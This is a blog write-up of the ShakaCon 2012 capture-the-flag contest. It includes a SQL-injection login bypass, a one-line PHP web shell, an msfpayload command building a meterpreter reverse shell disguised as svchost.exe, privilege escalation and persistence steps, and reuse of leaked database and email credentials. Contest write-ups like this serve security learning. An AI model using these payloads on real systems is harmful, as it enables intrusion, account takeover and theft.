Thursday, June 28, 2012

ShakaCon 2012 - The writeups

I've finally gotten around to write-ups for ShakaCon 2012.  The server that was set up to be attacked was 192.168.1.129 and the score server (which was hooked up to the projector in the conference) was 192.168.1.122, and we (all the attackers) were on 192.168.1.*

so, here we go:

Challenge 1 and challenge 2 were almost identical.  When you accessed the web root, you were presented with a login form, and the first thing I tried was just SQL injection.
 Admin
 '1==1;
logs you in.  OK, step 1 done.  Next you are presented with a gallery of images, and an upload form.  PHP upload vulnerabilities immediately come to mind.  It turns out that there is SOME filtering on the extension, but you can upload a simple PHP shell with a php extension:

lol777.php:

  <?php system($_GET['cmd']); ?>

and this got me a foothold onto the system.  I can run arbitrary commands like this:
  http://192.168.1.129/lol777.php?cmd=DIR /S c:\

Next, build a meterpreter exe:
  msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.108 X > svchost.exe

(with 192.168.1.108 being my x64 backtrack VM, note to self, change default passwords before these sorts of things)

next, set up the listening meterpreter session:


then run:
  http://192.168.1.129/lol777.php?cmd=svchost.exe
BOOM [shell] [pwned]

 So, with my inner hacker being so lazy, and my inner computer scientist telling me to take the path of optimality, meterpreter has this AWESOME search function that looks at the entire harddrive to file files matching a simple regex.

BOOM [challenge 1 - PWNED]
BOOM [challenge 2 - PWNED]
BOOM [challenge 5 - PWNED]

Since the web service was running as administrator on the box, I priv. escalated to SYSTEM, migrated to process 604 (the winlogin process), set up persistence, and then popped a VNC shell.  I now have a GUI to play with, as well as the command line!

First thing, change the desktop background to something inconspicuous so that the admins wouldn't know they were pwned:
With that done, I have SYSTEM access, full GUI and full meterpreter control of the box.  Pretty much game over, but I was still behind in points.  My main competition (ari) was overwriting the flags faster than I was, so when the clock ticked I was not getting points. My initial (and VERY inelegant) solution was this:
which is a simple loop (for forever) to make an HTTP request using curl to overwrite the key file.  No delay.  Just as fast and as hard as possible.

This wasn't a very good solution because he built a PHP script (running on the server) to constantly overwrite the server.  Hmm....I'm almost DOS'ing the box at this point (hitting both web services), so I need to go for something better:


I created a batch file, and threw it on the desktop and ran it:

 @ECHO OFF
:j
ATTRIB -s key_file
ATTRIB -r key_file
ECHO soen > key_file
ATTRIB +s key_file
ATTRIB +r key_file
goto j

 This was remarkably effective.  I closed the point gap quite quickly, but I soon stalled when ari got another service (challenge 3).  DUE TO A KILLED REPORTING PROCESS WE DID NOT CHANGE IN POINT DISTANCE (*cough* *cough*).

But once that was fixed, I started closing in on ari.  He then took the tactic of killing all processes not essential to the system.  And looping it.  So, no CMD.exe, my batch immediately died.

OK

What can I do to combat this?  Well, ari was taking the tactic of remaining outside the system shell (he didn't have a good laptop apparently).  I had full SYSTEM and meterpreter access.  What can I do with that?

WINDOWS ACLS

using meterpreter, I can execute commands (as if I was on the command line), so I decided to go the route of using CACLS.EXE to modify permissions on the key files.  The funny thing with windows: even though you're an administrator on the box (like the web server was running), if you don't have the right permissions you can't do stuff.  You can take away permissions from administrators (essentially).  SO, I removed all write access to the file (except for SYSTEM), then overwrote it with my handle (so I would "capture" the flag).  I did this to Challenge 1,2,5 (because I could find their keys).

Ari, despite his escalations did not regain control of those flags for the rest of the game.


THIS IS THE STORY OF THOSE OTHER FLAGS

The initial nmap scan of the box turned up 80 [challenge 1], 8080 [challenge 2], 3306 [challenge 3], and 31337 [challenge 5].

So I went in for challenge 3 next.
              3306 == mysql
so I fired up mysqld on a nat'd VM and then ran mysql...hmmm...root access denied.
I needed to look around and see what I could gather for credentials.  Almost immediately I found a "config.php" file in the webroot, and inside were:

<?php

    $dbhost = '127.0.0.1';
    $dbuser ='root';
    $dbpass ='!@sh4k4c0nctf2012!@';

    $link = mysql_connect($dbhost, $dbuser, $dbpass);
    if(!$link){exit('Server Not Responding.');}

    $db = 'ctf';
    $connect = mysql_select_db($db, $link);
    if (!$connect) {exit('DB Not Responding.');}

?>
Pay dirt.  super easy.  So, I connect in, there's a database called CTF.  Tables are users, info?, and key.  
SELECT * from key;
--cannot perform this operation

damn.  So at this point, I realized that I suck at MySQL esoterica.  I know I need to quote that thing out but BLOODY HELL I tried a ton of stuff that didn't work.  AFTER DROPPING THE TABLE and recreating it because ari was evil and set the length of one of the fields to 3 (so that my flag, 4 characters, wouldn't go in) I finally get to this little MySQL script:

use ctf;
delete from ctf.key where contents="ari";
delete from ctf.key where contents="soen";
insert into ctf.key (md5,contents) VALUES("c3_de1fce8459e13f3dfee749f30ae15", "soen");
select * from ctf.key;

Updating the key was being a pain, so I took the elegant solution:
perl -e 'while (1) { sleep(1); system("mysql -h 192.168.1.129 -u root --password=\\!\@sh4k4c0nctf2012\\!\@ < update_flag"); }'

yup

another perl while loop.  I hate myself.  Anyways, that locked the flag down for me.  However, the point skews showed that ari would occasionally get the flag, so I needed to look for how he was doing it.  He cleverly inserted a simple statement into the index.php page in the webroot that everyone was hitting constantly, and it updated the SQL with his username.  I decided, such a well hidden script deserves to stay there, but I swapped our names in the script, so it would capture it for me.  After a few minutes of losing point spread, he found it and was nigh-frothing at the lips when he came over and chided me on hacking his scripts.  Lulz.  <3 ari.  ANYWAYS, that wraps it up for challenge #3.

[challenge 4]
there was an entry inside of the sql table that had a username and password.  i tried gmail.  it worked.  references to twitter account set up.  log in to twitter with same uid/pw, @pwned_by_soen.  pointz.

A cool thing inside of the email account that I found was that there was a bit of (what I first through was python) AutoIt script.  this turns out to be the source code to challenge 5.


[challenge 5]
I just realized I lost the source code and my exploit for it.  It was a udp php shell thingy.  pretty cool, imo.

SO, with all the challenges pwned and scripted, time for [challenge infinity]

or

[scoreserver_hacking]

So:

After poking around, and some chiding from the server admins for killing it, I found the reporting mechanism on the box.  The whole system looked like this:

[192.168.1.129] key_reporter.exe -> [192.168.1.122] score_updater -> POINTS

I looked at the file in IDA.  packed.  damn.  easy enough, though.  I threw it into ollydbg, set a breakpoint on pusha, and another on the next popa (Thanks @Danny_Quist (he's kind of a big deal) and TracerFire 4 malware reversing class for the tips).  I then dumped the binary, ran strings on it.  AutoIT in strings.  
/facepalm
/facepalm
/facepalm
/facepalm
[downloaded AutoIT EXE decompiler] -> [source .AU3]






Pretty simple.  There was a delay of 5 seconds at the bottom.  I removed it, and ran the script (hoping, since I pwned all services I would get a REDICulous amount of points.  No such luck, the score_updater only ticked once ever 10 seconds or something, and if there was no input from key_reporter it just kept the current point spread and added points to it.)

So, I started pulling out the little encryption routine to make a plugin for my SQL mapper.  

AT THIS POINT THE CONTEST ENDED

and since I'm lazy, I didn't finish hacking the score server.  /fat

But I won, so hey, who's complaining?

Grats to ari on second, he had a lot of evil tricks up his sleeve and made the escalation of evilness a ton of fun.  Fun times.

I grabbed the http logs and did a touch of data analysis on them, and this is what it came out to:
IPs sorted by number of queries
('192.168.1.132', 835863)
('192.168.1.111', 22445)
('192.168.1.106', 4287)
('192.168.1.110', 1893)
('192.168.1.137', 1296)
('192.168.1.148', 811)
('127.0.0.1', 577)
('192.168.1.114', 468)
('192.168.1.149', 401)
('192.168.1.141', 271)
('192.168.1.147', 177)
('192.168.1.100', 100)
('192.168.1.124', 82)
('169.254.203.92', 39)
('169.254.119.122', 31)
('192.168.1.144', 22)
('192.168.1.2', 13)
('192.168.1.142', 6)
('192.168.1.140', 4)
('192.168.1.108', 4)
('192.168.1.112', 4)
('', 1)

I was pretty happy about the 4 coming from my VM (*.108), but just take a GUESS at whos computer was *.132

all those damn while(1){HIT THE SERVER WITH A HAMMER} loops


FINAL SCORE:

Look at that point spread....mhmmyeahhhh.

/flex


Thanks S-DNA guys for putting it on.  I appreciate it a ton!

Mahalo,

Posted by at

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)